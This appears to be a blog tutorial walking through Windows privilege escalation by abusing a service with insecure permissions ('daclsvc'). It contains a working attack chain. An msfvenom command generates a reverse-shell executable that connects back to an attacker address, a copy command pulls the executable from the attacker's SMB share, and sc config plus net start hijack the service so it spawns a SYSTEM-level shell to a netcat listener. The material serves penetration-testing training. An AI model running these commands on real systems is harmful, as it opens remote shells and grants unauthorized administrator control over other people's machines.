Windows PrivEsc using Insecure Service Permissions

Today, we’ll use the Windows privilege escalation approach with the insecure service permission. This lesson can be helpful when you attempt to exploit a Windows computer using a vulnerability utilising publicly available exploits to gain access to a privileged user and attempting to escalate the admin rights.

Before, move to the exploitation part. We need to identify our victim machine has an insecure running service. You can use the windows privilege escalation awesome script “WinPEAS.exe” to find out whether insecure services are running or not. In this scenario, the victim machine has an insecure running service called “daclsvc“. Let’s exploit this service.

First, we need to create a payload to get an active session of the least privileged user. I use “msfvenom” to generate a windows payload for this scenario.

				
					msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe
				
			

Note: Make sure to update the LHOST IP address accordingly.

Once you generate the payload file, you can transfer it to the victim machine. So, I am going to transfer the payload to the C:\PrivEsc\ directory in our victim machine. There are many ways you could do this. The simplest way is to start an SMB server on the Kali machine in the same directory as the file, and then use the standard Windows copy command to transfer the file.

				
					copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe
				
			

Now our system is ready to perform the privilege escalation attack.

Exploit:

First, we need to check the user account permission in the daclsvc service. I used SharpUp.exe to check the user account and permission. the SharpUp is the start of a C# part of PowerUp’s privilege escalation checks. Currently, only the most common checks have been ported; no weaponization functions have yet been implemented. You can download the script using the below link.

You can identify that the user has modifiable service “daclservice.exe”. Next, we need to query the service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).

				
					sc qc daclsvc
				
			

Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable we created:

				
					sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
				
			

Start an NC listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges.

To start the service:

				
					net start daclsvc
				
			

Check your Netcat listener, User is now an admin 😎

Share this post:
udesh

udesh

Leave a Reply

Your email address will not be published. Required fields are marked *